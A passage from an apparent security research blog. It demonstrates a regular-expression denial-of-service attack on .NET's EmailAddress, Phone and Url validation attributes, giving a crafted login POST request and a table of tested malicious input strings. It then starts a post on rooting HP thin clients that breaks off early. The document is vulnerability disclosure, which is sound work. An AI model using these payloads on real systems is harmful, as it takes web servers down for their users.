<br /></div>
<div>
<b>The exploit</b></div>
<div>
<br /></div>
<div>
The exploitation consists in sending a crafted HTTP POST request against a web form using a vulnerable class (e.g. EmailAddressAttribute). As an example, the attack is demonstrated against a .NET MVC web application developed with the Visual Studio 2013. The application provides a login form which uses the default email address validation mechanism in .NET framework. The screen shot below shows the login page:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf0rCerZz4Z9BpJFK8bkCFqEuoakT1weT877khdJagltU_3pA7y5sUSiLo2gefZibSTfcCLtPusr8x0fm8qhLuLUGu8PPQNp-zTaF7FdGystbaXof0HROpvI17nnT2sdLx4Dn3xSRh2UU/s1600/login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf0rCerZz4Z9BpJFK8bkCFqEuoakT1weT877khdJagltU_3pA7y5sUSiLo2gefZibSTfcCLtPusr8x0fm8qhLuLUGu8PPQNp-zTaF7FdGystbaXof0HROpvI17nnT2sdLx4Dn3xSRh2UU/s320/login.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
An attacker can bypass client-side validation in .NET by sending the request via script or proxy and manipulating the request, as shown below:</div>
<div>
<br /></div>
<div>
<div>
<i>POST /Account/Login HTTP/1.1</i></div>
<div>
<i>Host: 192.168.0.13</i></div>
<div>
<i>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</i></div>
<div>
<i>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</i></div>
<div>
<i>Accept-Language: en-US,en;q=0.5</i></div>
<div>
<i>Accept-Encoding: gzip, deflate</i></div>
<div>
<i>Referer: http://192.168.0.13/Account/Login</i></div>
<div>
<i>Cookie: __RequestVerificationToken=FkLGrc6-XD2IBVU9g1nPycs0GTu3jWiK2QEyvR8IsowXAJU3C5fHlHvQvwGgB0VcN1FTa_hB9KZ6Pi8SeI5EKpvz_EeOqD7y_FnipWJWqOU1</i></div>
<div>
<i>Connection: keep-alive</i></div>
<div>
<i>Content-Type: application/x-www-form-urlencoded</i></div>
<div>
<i>Content-Length: 239</i></div>
<div>
<i><br /></i></div>
<div>
<i>__RequestVerificationToken=HQq6--asc9wLbvnvuapMLuj5y9f8tSg9n0JiEFivqKv_aeyl6eSaHaDtymjPgusP-spu-oUYa0xm7n_RKjmS9WOU2so8S96X6oY7K2fd3lk1&Email=<span style="color: red;"><b>t@t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.c%20</b></span>&Password=test&RememberMe=false</i></div>
</div>
<div>
<br />
Below, an extract of the source code used for the validation of the EmailAddress field:<br />
<br /></div>
<div>
AccountModelView.cs - use of [EmailAddress] default class in .NET</div>
<div>
<br /></div>
<div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">public</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">class</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">LoginViewModel</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
{<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
[</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">Required</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">]<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
[</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">Display</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">(Name </span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">=</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #d69d85; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">"Email"</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">)]<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
[</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">EmailAddress</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">]<o:p></o:p></span></div>
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;">public</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;">string</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;"> Email { </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;">get</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;">; </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;">set</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;">; }</span></div>
<div>
<br /></div>
<div>
AccountController.cs – ModelState is validated when the POST request occurs</div>
<div>
<br /></div>
<div>
<div class="MsoNormal">
<span style="background: black; color: #57a64a; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">// POST: /Account/Login</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
[</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">HttpPost</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">]<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
[</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">AllowAnonymous</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">]<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
[</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">ValidateAntiForgeryToken</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">]<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
</span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">public</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">async</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">Task</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"><</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">ActionResult</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">></span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> Login(</span><span style="background: black; color: #4ec9b0; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">LoginViewModel</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> model, </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">string</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
returnUrl)<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
{<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">if</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> (</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">!</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">ModelState</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">.</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">IsValid)<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> {<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">return</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
View(model);<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> }<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #57a64a; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">// This doesn't count login failures towards account
lockout</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #57a64a; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">// To enable password failures to trigger account lockout,
change to shouldLockout: true</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">var</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
result </span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">=</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">await</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> SignInManager</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">.</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">PasswordSignInAsync(model</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">.</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">Email,
model</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">.</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">Password, model</span><span style="background: black; color: #b4b4b4; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">.</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">RememberMe, shouldLockout: </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">false</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">);<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;"> </span><span style="background: black; color: #569cd6; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">switch</span><span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-highlight: black;">
(result)<o:p></o:p></span></div>
<span style="background: black; color: gainsboro; font-family: Consolas; font-size: 9.5pt; line-height: 107%; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-highlight: black;"> {</span></div>
<div>
<br /></div>
<div>
The table below shows the DoS condition on the web server, after the request has been issued.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtyUgsxtuxjQb7277Ppwt92L7VOM_94k-o1AiTJwmoBQKE-N6UtWgz5pcab8Jj3UTq_xie2SM1cDFA9RD4TFlx70C0Zzv5m8k0qUiHKTmfHcFMMihiBOk_rZ9pzMOskM3Ez1dTOBveACU/s1600/w3wpdos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtyUgsxtuxjQb7277Ppwt92L7VOM_94k-o1AiTJwmoBQKE-N6UtWgz5pcab8Jj3UTq_xie2SM1cDFA9RD4TFlx70C0Zzv5m8k0qUiHKTmfHcFMMihiBOk_rZ9pzMOskM3Ez1dTOBveACU/s320/w3wpdos.png" width="320" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqNwuRuqLgbZqBZhhYo5wjcHqK7k8cOOjdtjyubyRSv-tNNPlurjAijWiIFV8iEcXytEVulenraalVya8Uqx5gOugdhcnsFt73x9Eal8CeZjbX9tF2BgyYg251CcIyfNAbsPXAg0slQGc/s1600/dos2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqNwuRuqLgbZqBZhhYo5wjcHqK7k8cOOjdtjyubyRSv-tNNPlurjAijWiIFV8iEcXytEVulenraalVya8Uqx5gOugdhcnsFt73x9Eal8CeZjbX9tF2BgyYg251CcIyfNAbsPXAg0slQGc/s320/dos2.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<div>
Following the request, the Denial of Service occurs against the /Account/Login controller class. At this stage, no other users can use /Account/Login form controller class, while the w3wp.exe process is at 99% CPU starvation.</div>
<div>
<br /></div>
<div>
The w3wp.exe process needs to be terminated in order to recover the application from the attack. After few manual recoveries, the application becomes unusable, and the server needs to be restarted.</div>
<div>
<br />
Below a video that demonstrates the attack in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/nOpAQFvbYFk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/nOpAQFvbYFk?feature=player_embedded" width="320"></iframe></div>
<br />
<br /></div>
<div>
The table below includes valid and tested attack patterns which result in a successful ReDoS attack against .NET applications:<br />
<br /></div>
</div>
<div>
</div>
<div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-table-layout-alt: fixed; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b>Malicious Payload<o:p></o:p></b></div>
</td>
<td style="border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<b>Class<o:p></o:p></b></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
t@t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.<br />
t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.t.c%20<o:p></o:p></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
EmailAddressAttribute<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
666666666666666666666666666666666666d<o:p></o:p></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
PhoneAttribute<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 179.75pt;" valign="top" width="300"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Consolas; font-size: 10.0pt;">http%3A%2F%2FtFtFtFtFtFtFtFtFtFtFtFtFtFtF<br />tFtFtFtFtFtFtFtFtFtFtest%2ecoK%2ecoK%2eco<br />K%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ec<br />oK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2e<br />coK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2<br />ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%<br />2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK<br />%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2eco<br />K%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ec<br />oK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2ecoK%2e<br />coK%2ecoK%2ecoKøøm</span><o:p></o:p></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 116.75pt;" valign="top" width="195"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
UrlAttribute<o:p></o:p></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
</div>
<div>
<br /></div>
<div>
<b>References</b></div>
<div>
<br /></div>
<div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS">https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://www.owasp.org/images/3/38/20091210_VAC-REGEX_DOS-Adar_Weidman.pdf">https://www.owasp.org/images/3/38/20091210_VAC-REGEX_DOS-Adar_Weidman.pdf</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/hs600312%28v=vs.110%29.aspx">https://msdn.microsoft.com/en-us/library/hs600312%28v=vs.110%29.aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/e347654k%28v=vs.110%29.aspx">https://msdn.microsoft.com/en-us/library/e347654k%28v=vs.110%29.aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/gg578045(v=vs.110).aspx">https://msdn.microsoft.com/en-us/library/gg578045(v=vs.110).aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://msdn.microsoft.com/en-us/library/01escwtf(v=vs.110).aspx">https://msdn.microsoft.com/en-us/library/01escwtf(v=vs.110).aspx</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3275">https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3275</a><o:p></o:p></div>
</div>
<div>
<br /></div>
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com3tag:blogger.com,1999:blog-5593108060941425908.post-37973468778937944422015-04-27T01:37:00.000+02:002015-04-27T08:07:55.037+02:00Pwning a thin client in less than two minutes<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
</div>
<br />
<br />
Have you ever encountered a zero client or a thin client? It looks something like this...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEhlWSaZWhhFJAX643DRGmoJ4sJ699d62nOH1KZIRL3UBbON1ZlSvL-D59s1g-Y1Jrg4bgIBmkcT06krf_-tQh6dsxG4WwDhET7_Rad0zOLkwniXjEtG_tY6-G8oHtSa3D7LnOp9O6y5fLkc3vZrJRPpbwM5vuvvYshLSWcZ2IqV2JR1cF3qGobIZSc=" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://product-images.www8-hp.com/digmedialib/prodimg/lowres/c04245042.png" /></a></div>
<br />
If yes, keep reading below, if not, then if you encounter one, you know what you can do if you read below...<br />
<br />
The model above is a T520, produced by HP - this model and other similar models are typically employed to support a medium/large VDI (Virtual Desktop Infrastructure) enterprise.<br />
<br />
These clients run a Linux-based HP ThinPro OS by default and I had a chance to play with image version <a href="ftp://ftp.hp.com/pub/tcdebian/images/">T6X44017</a> in particular, which is fun to play with it, since you can get a root shell in a very short time without knowing any password...<br />
<br />
Normally, HP ThinPro OS interface is configured in a kiosk mode, as the concept of a thin/zero client is based on using a thick client to connect to another resource. For this purpose, a standard user does not need to authenticate to the thin client per se and would just need to perform a connection - e.g. VMware Horizon View. The user will eventually authenticate through the connection.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The point of this blog post is to demonstrate that a malicious actor can compromise such thin clients in a trivial and quick way provided physical access, a standard prerequisite in an attack against a kiosk.<br />
<br />
During my testing, I have tried to harden as much as possible the thin client, with the following options:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdll-oU9NNRy4IruBQqtr-A49CcAmwbk6IVDHl3Y13GgY045cheudd25Lbo9x7-pwmNyuQr2i3TchxlmIYOocH3DJsfUczAod-P6waxqaYHGrVbFFvupSD6E619MS7lNUxegcLgn54Qjw/s1600/hp-settings2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdll-oU9NNRy4IruBQqtr-A49CcAmwbk6IVDHl3Y13GgY045cheudd25Lbo9x7-pwmNyuQr2i3TchxlmIYOocH3DJsfUczAod-P6waxqaYHGrVbFFvupSD6E619MS7lNUxegcLgn54Qjw/s1600/hp-settings2.png" height="400" width="350" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_qqFgtEu0M3VovWUKsxem05BFPrppXl1c7KLWRpIVz8Zql6g8LdSlVlmHNmcH1opEH-kqZ8J4XPJcMg1hwTGwmTxYF7IriH8YahZHngBqC2EF-e5a7MEOMdlDKWJWCInq9_rmWOYnS0I/s1600/hp-settings1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_qqFgtEu0M3VovWUKsxem05BFPrppXl1c7KLWRpIVz8Zql6g8LdSlVlmHNmcH1opEH-kqZ8J4XPJcMg1hwTGwmTxYF7IriH8YahZHngBqC2EF-e5a7MEOMdlDKWJWCInq9_rmWOYnS0I/s1600/hp-settings1.png" height="400" width="391" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
